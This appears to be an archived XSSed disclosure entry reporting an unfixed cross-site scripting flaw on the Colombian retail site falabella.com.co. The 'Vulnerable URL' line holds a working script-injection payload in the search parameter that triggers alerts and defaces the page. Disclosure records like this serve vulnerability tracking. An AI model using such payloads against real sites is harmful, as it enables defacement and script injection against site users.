Unfixed XSS vulnerability at www.falabella.com.co

2010-10-28T00:00:00
ID XSSED:70287
Type xssed
Reporter sh3n
Modified 2011-12-20T00:00:00

Description

Security researcher sh3n, has submitted on 28/10/2010 a cross-site-scripting (XSS) vulnerability affecting www.falabella.com.co, which at the time of submission ranked 32141 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.falabella.com.co/falabella-co/browse/searchResult.jsp;jsessionid=34F5840CBD71E668BE8C91A90AF15BB4.node3?_dyncharset=iso-8859-1&texto-busqueda=x280%29%27,length:1}%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%22%29%3C/script%3E%3Cscript%3Ealert%28%22sh3n%22%29%3C/script%3E%3Cscript%3Efunction%20do_main%28%29{document.body.innerHTML=%22%3Ch1%3EXSHacked%20by%20sh3n%22}do_main%28%29;%3C/script%3Ereturn_result&_D%3Atexto-busqueda=+&docSort=numprop&_D%3AdocSort=+&pageSize=16&_D%3ApageSize=+&docSortOrder=ascending&_D%3AdocSortOrder=+&docSortProp=price&_D%3AdocSortProp=+&%2Fatg%2Fcommerce%2Fsearch%2Fcatalog%2FQueryFormHandler.search=Search&_D%3A%2Fatg%2Fcommerce%2Fsearch%2Fcatalog%2FQueryFormHandler.search=+&_DARGS=%2Ffalabella-co%2Fsearch%2Fincludes%2Fsearch.jsp.searchForm